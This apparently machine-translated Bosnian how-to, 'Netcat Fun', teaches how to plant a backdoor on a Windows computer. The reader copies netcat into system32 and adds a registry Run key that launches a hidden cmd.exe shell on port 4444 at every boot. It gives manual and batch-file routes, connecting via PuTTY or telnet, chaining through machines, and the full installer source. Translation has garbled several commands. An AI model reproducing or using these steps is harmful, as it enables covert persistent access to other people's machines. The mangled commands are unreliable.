Netcat Fun !: 5 koraka

2024 Autor: John Day | [email protected]. Zadnja izmjena: 2024-01-30 08:08

Ova instrukcija vam pokazuje kako stvoriti backdoor na računaru s netcat -om! Pokazat ću vam dva načina da to učinite, sa i bez moje paketne datoteke koja vam to automatizira. Ova instrukcija već pretpostavlja da ste već dobili root dozvole na računaru, vjerovatno sa 0phcrack LiveCD -om ovdje. Sada, na uputstva.

Korak 1: Preuzmite Netcat

Uštedio sam vam probleme od 3 minute pretraživanja Googlea i postavio nc.exe na upute za preuzimanje. Opcionalno, možete preuzeti i nc.bat koji je paketna datoteka koju sam stvorio za automatizaciju procesa umjesto vas. Pobrinite se da ako preuzmete nc.bat to bude 464 bajta jer sam stalno učitavao verzije i otkrivao da nešto nije u redu s tim. Ako nije 464 bajta, program neće odgovarati ovom uputstvu.

Korak 2: Sa Nc.bat

Prvo, obje datoteke moraju biti u istom direktorijumu da bi nc.bat ispravno radio. Predlažem da za ovu operaciju koristite fleš disk ili CD-ROM. Za to sam koristio fleš disk od 512 MB geek squad, ali to sam samo ja. Dakle, kopirajte datoteke na vanjski medijski uređaj i donesite ih na računalo na kojem imate root. Idite na medijski uređaj i dvaput kliknite na nc.bat. Ovo će kopirati datoteku nc.exe u fasciklu system32, u sistemskom korenu (obično C: / Windows ili C: / WINNT) i izvršiti potrebne promene u registru. Zatim zapišite IP adresu. To će biti nešto poput '192.168.1.103', što je moje. Nakon što to učinite, ponovo pokrenite uređaj i prijavite se. Tada će vas antivirusni program pitati želite li dopustiti/onemogućiti program. Kliknite na 'Dozvoli' ili slično. Imajte na umu da u ovom uputstvu možete telnet ući samo s lokalne mreže tog računara. Zatim napustite ili se odjavite ili šta god želite.

Korak 3: Bez Nc.bat

Da biste to učinili, morate imati nc.exe na CD -u ili Flash pogonu. Idite na računar, prijavite se i uključite fleš disk ili ubacite CD. Odavde postoje dva načina: uglađeni grafički korisnički interfejsi prozora ili prljavi, staromodni način komandne linije. Prljavi, staromodni način komandne linije: Povucite komandnu liniju tako što ćete otići na StartRun i upišite:

cmd.exeIdite na fleš ili CD pogon. Ako ne znate koji je pogon, kliknite desnim tasterom miša na dugme za početak i kliknite Istraži. Pritisnite sve ne-lokalne pogone u Mom računaru dok ne dođete do vašeg flash/CD pogona. Zapamtite slovo pogona i vratite se u komandnu liniju. Upišite slovo pogona iza kojeg slijedi dvotočka, ovako: K: Zatim upišite jedan po jedan red, a zatim pritisnite tipku za povratak

kopirajte nc.exe%systemroot%\ system32 / nc.exereg dodajte HKLM / SOFTVER / Microsoft / Windows / CurrentVersion / Run /f /v nc /d "%systemroot%\ system32 / nc.exe -L -d -p 4444 - t -e cmd.exe "To je otprilike bila instalacija. Sve što trebate znati je lokalna IP adresa, koju možete lako pronaći upisivanjem naredbe 'ipconfig' i traženjem nečega u tablici poput "192.168.1.103". Zatim ponovo pokrenite uređaj i ponovo se prijavite. Antivirusni program će vas možda pitati želite li dopustiti/onemogućiti. Kliknite na dozvoli. Tada ste slobodni da radite šta želite sa računarom. Uglađeni grafički interfejsi operativnog sistema Windows Desnim tasterom miša kliknite dugme Start i kliknite Istraži. Pritisnite sve ne-lokalne pogone u Mom računaru dok ne dođete do vašeg flash/CD pogona. Zatim desnom tipkom miša kliknite nc.exe i kopirajte. Zatim idite na pogon C i kliknite na mapu Windows ili WINNT. Zatim idite u fasciklu system32 i zalijepite nc.exe. Zatvorite to i idite na StartRun. Upišite regedit. Krećite se kroz mape do: HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Run Zatim desnom tipkom miša kliknite prazan prostor i idite na NewString Value. Upišite sve što želite za ime, ali za vrijednost, upišite

%systemroot%\ system32 / nc.exe -L -d -p 4444 -t -e cmd.exeTo je otprilike bila instalacija. Sve što trebate znati je lokalna IP adresa, koju možete lako pronaći upisivanjem naredbe 'ipconfig' u naredbeni redak (StartRun: cmd.exe) i traženjem nečega u tablici poput "192.168.1.103". Zatim ponovo pokrenite uređaj i ponovo se prijavite. Antivirusni program će vas možda pitati želite li dopustiti/onemogućiti. Kliknite na dozvoli. Tada ste slobodni da radite šta želite sa računarom.

Korak 4: Vraćanje nazad

Nakon što ga instalirate i želite preuzeti kontrolu nad hostom, otvorite naredbeni redak ili PuTTY. Mislim da je PuTTY odličan, pa ću vam dozvoliti da ga preuzmete ovdje. Upotrebom PuTTYDownload i otvorite PuTTY.exe. Kliknite na 'neobrađeni' protokol. U okvir za tekst porta # upišite 4444. U okvir 'adresa domaćina' upišite IP adresu koju ste zapisali tokom instalacije. Zatim pritisnite enter. PuTTY bi se trebao spojiti na okvir i dobit ćete naredbeni redak. Korištenje naredbenog retka Otvorite naredbeni redak i upišite 'telnet 4444'. Zatim pritisnite enter i trebali biste dobiti naredbeni redak. Ovo će vam omogućiti da s računarom daljinski radite gotovo sve što želite, a što možete učiniti s lokalnim računom. Zaista postaje zanimljivo kada uđete u jedan računar, a zatim uđete u drugi računar sa tog računara, kako biste spojili cijeli lanac računara. Zabavite se (legalno)!

Korak 5: Izvorni kod

Pošto sam zamoljen, postaviću izvorni kod (za paketnu datoteku) i objasniti svaku naredbu i šta ona radi. Budite svjesni! Ovo je trenutna verzija programa za paketno instaliranje. Ako je vaš drugačiji, kôd će se razlikovati.

@echo offcopy nc.exe%systemroot%\ system32 / nc.exeif errorlevel 0 goto regeditgoto error: regeditreg add HKLM / SOFTWARE / Microsoft / Windows / CurrentVersion / Run /f /v nc /d "%systemroot%\ system32 / nc. exe -L -d -p 4444 -t -e cmd.exe "ako je greška na nivou 0 goto ip: errorecho dogodilo se nešto neočekivano, a program mora izaći. goto end: ipecho zapišite IP adresu iz tableipconfig: endecho end.eho ljepljiva traka van.pauza@echo off-Kaže mu da ne prikazuje naredbe pri izvršavanju.copy nc.exe %systemroot %\ system32 / nc.exe-obično kopira netcat u C: / WINDOWS / system32. Zbog toga, kada se vratite unutra, umjesto da stalno mijenjate direktorije, možete samo upisati "nc" da otvorite drugi port.if errorlevel 0 idite na provjeru regedit-greške. Ako je kopija bila uspješna, nastavlja se s uređivanjem registra.goto error-Ako je došlo do greške, idite na: error label.:regedit-A oznaku, navodeći da, kada program kaže "goto regedit", idite ovdje.reg add HKLM / SOFTWARE / Microsoft / Windows / CurrentVersion / Run /f /v nc /d "%systemroot%\ system32 / nc.exe -L -d -p 4444 -t -e cmd.exe" -(trebalo bi biti jedan red) koji dodaje ključ registra za ponovno pokretanje programa pri ponovnom pokretanju. /f znači prepisivanje postojećeg ključa, /v za naziv ključa, /d za podatke. Ostatak oznaka je unos za netcat. -L kaže da ga ponovo pokrenete pri izlazu, tako da ne morate čekati da se računar ponovo pokrene. -zaboravio sam. -p 4444 navodi port #. -zaboravila sam. -e cmd.exe omogućava pokretanje naredbenog retka na udaljenoj vezi.if errorlevel 0 goto ip-error check. Ako je pokretanje pošlo po zlu, preskočit će ovaj redak i spustiti se na: error label.echo dogodilo se nešto neočekivano i program mora izaći.-govori programu da ispiše "dogodilo se nešto neočekivano i program mora izaći "na ekranu. idite na kraj-ako je otišlo do poruke o grešci, nešto je pošlo po zlu i program se ipak mora zatvoriti.: ip-Opet, label.echo zapišite IP adresu iz tablice-Zapisuje" zapišite IP adresa iz tablice "to the screen.ipconfig-Ovo je naredba koja ispisuje informacije o postavkama vaše lokalne mreže (LAN).:end-Label.echo end.-piše" end "na screen.echo ljepljivu traku. -pisuje "ljepljivu traku" na ekran.pause-ova naredba pauzira program i čeka da korisnik pritisne tipku. U ovom programu čeka na unos, a zatim izlazi iz programa.